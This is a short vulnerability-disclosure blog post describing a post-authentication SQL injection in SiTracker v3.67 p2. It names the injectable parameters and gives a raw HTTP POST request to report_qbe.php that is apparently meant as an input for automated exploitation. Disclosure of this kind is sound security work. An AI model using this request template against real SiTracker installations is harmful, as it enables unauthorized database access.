czwartek, 25 czerwca 2020

Postauth SQLi in SiTracker v3.67 p2

Few days ago I tried another VM from TurnKeyLinux - SiTracker (v3.67 p2). Below you will find few notes from the journey. Here we go...



This time we'll start here:

TL;DR - I thought that this (3.67 p2) version is "the new" one - and indeed it is. But since 2013 afaik it was never updated... ;) So, yeah. "The latest" ;D Anyway... ;]

SQLi bug described below is ("mostly focused" ;)) on admin-part-of-webapp. Few reasons of 'why' - you'll find on the screens below:

a) site_edit.php -> typeid, site


b) search_incidents_advanced.php -> search_title



... cleanvar() function in action:


... and so on. ;) So let's get back to our SQL injection for admin user logged-in:

c) report_qbe.php -> param criteriafield:


More precisely:


DIY version for your private legal CTFs only ;)

---<cut>---
c@kali:~$ cat test1.txt
POST /report_qbe.php HTTP/1.1
Host: 192.168.1.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 183
Origin: http://192.168.1.10
Connection: close
Referer: http://192.168.1.10/report_qbe.php
Cookie: sugar_user_theme=SuiteP; ck_login_id_20=1; ck_login_language_20=en_us; Accounts_divs=Accounts_documents_v%3Dtrue%23undefined%3D%23Accounts_accounts_v%3Dtrue%23Accounts_project_v%3Dtrue%23; AOR_Reports_divs=AOR_Reports_aor_scheduled_reports_aor_reports_v%3Dtrue%23undefined%3D%23; PHPSESSID=7a4rcc45nracu0s7vg2alnqeq1; ZMSESSID=nh054rbcptbu3svclu3dbqpvi1; SiTsessionID=fkum2is1ac6m4nit7o7erge8g7
Upgrade-Insecure-Requests: 1

sortby=servicelevelid&sortorder=none&criteriafield=rapnadzielni&criteriaop=eq&criteriaval=aaa&limit=1000&output=screen&table1=billing_periods&mode=report
c@kali:~$ ^C
---</cut>---

You'll find it here:



Maybe you'll find it useful. ;]


Special thanks goes to my Patreon: Daniel.
You are AWESOME! ;)


See you next time!

Cheers









Brak komentarzy:

Publikowanie komentarza